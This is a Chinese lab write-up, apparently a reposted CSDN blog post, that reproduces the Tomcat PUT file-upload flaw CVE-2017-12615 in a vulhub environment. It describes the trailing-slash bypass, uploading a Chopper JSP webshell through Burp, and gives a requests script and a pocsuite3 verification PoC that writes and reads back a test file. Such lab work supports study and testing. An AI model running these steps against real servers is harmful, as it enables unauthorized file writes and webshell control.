我要评论CVE-2017-12615漏洞复现复现
环境搭建地址:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615
Tomcat版本:8.5.19
漏洞原理:
tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对上传的文件尾部有检测,所以可以用/来绕过,如 /shell.jsp/
源码内容:
<servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>listings</param-name> <param-value>false</param-value> </init-param> <init-param> <param-name>readonly</param-name> <param-value>false</param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> readonely设置为了false,说明可以写文件
-
提交数据包,burp查看内容
-
在repter模块对提交的数据进行更改,上传菜刀的jsp一句话木马
3. 菜刀连接
连接成功
参考链接:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md
关于此漏洞poc的编写,–verify模式
- 首先要掌握request模块put方法的使用
-
验证模块的思路:
- 先用put方法提交一个.txt的文件
-
然后用get方法访问这个新的url,读取网页内容,如果状态码为200且写入的txt文本在网页内,说明存在漏洞
下边是本地windows测试put方法的脚本
import requests
url = 'http://192.168.0.104:8080/' data = "hello world" new_url = url + "tcc.txt" res = requests.put(url=new_url,data=data) respone = requests.get(url=new_url) print(respone.url) print(respone.status_code) if respone.status_code == 200 and "hello world" in respone.text: print(respone.url) print("success") 最后利用pocsuite3框架,完成编写
from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY import requests class DemoPOC(POCBase): #实现类DemoPoc,继承自POCBase vulID = '1.1' version = '1.1' author = ['1'] vulDate = '1.1' createDate = '2020/10/10' updateDate = '1.1' references = ['tomcat'] name = 'tomcat-poc' appPowerLink = 'tomcat' appName = 'tomcat' appVersion = 'tomcat' vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
tomcat
''' #samples = ['96.234.71.117:80'] #category = POC_CATEGORY.EXPLOITS.REMOTE def _verify(self): #验证代码函数 result = {} #result返回结果 path = "/vluhub.txt" url = self.url + path
payload = "target is vulnerable" res = requests.put(url=url,data=payload) try: respone = requests.get(url=url) if respone.status_code == 200 and "target is vulnerable" in respone.text: result['VerifyInfo'] = {} result['VerifyInfo'] = url
result['VerifyInfo'] = payload return self.parse_output(result) except Exception as e: return return self.parse_output(result) def _attack(self): #注意:若该poc没有攻击模式,在_attack函数下,return self._verigy(),不用再写_attack() return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output
register_poc(DemoPOC)
修复
升级tomcat版本
本文地址:https://blog.csdn.net/qq_34640691/article/details/109051748
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论